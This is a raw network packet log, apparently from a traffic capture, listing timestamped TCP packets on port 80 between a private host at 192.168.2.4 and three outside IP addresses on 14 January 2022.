Jan 14, 2022 00:16:13.912081957 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.912106991 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.912146091 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.912158966 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.912184954 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.912224054 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.912237883 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.912264109 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.912302017 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.912316084 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.912341118 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.912377119 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.912393093 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.912415981 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.912462950 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.912471056 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.912499905 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.912559986 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.912806988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.912920952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.913084030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.913157940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.913276911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.913387060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.913491011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.913594961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.913724899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.913754940 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.913798094 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.913825035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.913836956 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.913856983 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.913903952 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.913922071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.913942099 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.913960934 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.913980961 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.914020061 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.914035082 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.914057016 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.914108038 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.915210009 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.915255070 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.915291071 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.915335894 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.915342093 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.915393114 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.915420055 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.915460110 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.915498018 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.915509939 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.917377949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.917510033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.917643070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.917994976 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918035030 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918061018 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.918073893 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918114901 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918132067 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.918152094 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918191910 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918205023 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.918595076 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918632984 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918668032 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.918672085 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918713093 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918728113 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.918751955 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918791056 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918803930 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.918829918 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918867111 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918894053 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.918906927 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918946028 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.918960094 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.918986082 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919028044 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919042110 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.919065952 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919105053 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919117928 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.919145107 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919182062 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919203997 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.919219971 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919258118 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919270992 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.919296980 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919336081 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919353008 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.919373035 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919411898 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919425964 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.919450998 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919488907 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919502974 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.919527054 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919565916 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919579029 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.919606924 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919645071 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919670105 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.919682980 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919720888 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919735909 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.919759989 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919795990 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919815063 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.919835091 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919872046 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919886112 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.919910908 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919950008 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.919962883 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.919986963 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920026064 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920036077 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.920066118 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920101881 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920118093 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.920142889 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920181036 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920196056 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.920219898 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920258999 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920272112 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.920295000 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920332909 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920346022 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.920372009 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920408010 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920420885 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.920447111 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920485020 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920512915 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.920522928 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920564890 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920578003 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.920619965 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920660019 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920697927 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920697927 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.920734882 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920753002 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.920774937 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920824051 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920828104 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.920871019 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920911074 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920927048 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.920948029 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.920994043 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.921010971 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.921032906 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.921068907 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.921070099 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.921083927 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.921108007 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.921144009 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.921159983 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.921184063 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.921222925 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.921236992 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.921260118 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.921298981 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.921312094 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.921339035 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.921389103 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.921510935 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.937903881 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.937958956 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.937993050 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.938019991 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.984733105 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.026787043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.027054071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.027089119 CET	49912	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.027410984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.027689934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.027957916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.028177023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.028403044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.028640985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.028877974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.029103041 CET	49919	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.031086922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.031224012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032588959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032597065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032599926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032602072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032603979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032605886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032607079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032608986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032612085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032613993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032615900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032618046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032622099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032792091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.032912970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.033014059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.033111095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.033205986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.033303976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.033452988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.033543110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.033793926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.033920050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.034037113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.034138918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.034240961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.034357071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.034470081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.034575939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.034689903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.034802914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.034904003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.035003901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.035106897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.035204887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.035305977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.035413027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.035515070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.035618067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.035718918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.035819054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.035921097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.036029100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.036129951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.036233902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.036339045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.036441088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.036542892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.036643028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.036772966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.036880970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.036999941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.037130117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.037257910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.037388086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.037507057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.037765980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.038058043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.038156033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.038249969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.038341045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.043860912 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.055383921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.055633068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.055834055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.055936098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.056041002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.056143999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.056356907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.056591034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.056710958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.056807995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.056962013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.057140112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.057260036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.057353020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.057440042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.057531118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.057622910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.057790041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.057936907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.058049917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.058151007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.058232069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.058322906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.058414936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.058504105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.058648109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.058746099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.058868885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.058978081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.059067011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.059160948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.059250116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.059339046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.059431076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.059536934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.059663057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.059789896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.059906006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.059998989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.060117006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.060226917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.060318947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.060410023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.060520887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.060647011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.060774088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.060893059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.060981989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.061069965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.061157942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.061245918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.061332941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.061445951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.061553001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.061683893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.061799049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.061893940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.061985016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.062077999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.062166929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.062257051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.062381029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.062519073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.062618971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.062740088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.062832117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.062917948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.063011885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.063100100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.063189030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.063319921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.063441992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.063554049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.063649893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.068701029 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:14.096204042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.096343040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.096391916 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.096539021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.096596956 CET	80	49919	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.096632957 CET	80	49912	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.096704960 CET	49919	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.096729040 CET	49912	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.096780062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.096888065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.096982002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.097069025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.097174883 CET	49902	80	192.168.2.4	185.215.113.35
